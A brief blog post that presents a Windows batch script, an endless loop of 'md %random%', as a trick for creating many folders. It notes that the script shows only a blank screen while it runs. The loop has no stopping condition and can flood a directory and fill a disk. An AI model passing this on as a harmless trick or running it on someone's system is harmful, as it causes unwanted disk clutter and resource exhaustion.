Thursday 3 March 2016

Simple Trick To Make 1000 Folders In A Few Second

Open notepad and type

@echo off
:top
md %random%
goto top

@echo off - makes it appears to be a blank screen but actually its creating hundreds of folder.

md %random% is the command for creating folders with random names.

goto top – return to label :top, infinite loop

Save it as   sparrow.bat [ name can be anything but .bat is must] then run it..

#sparrow

0 comments:

Post a Comment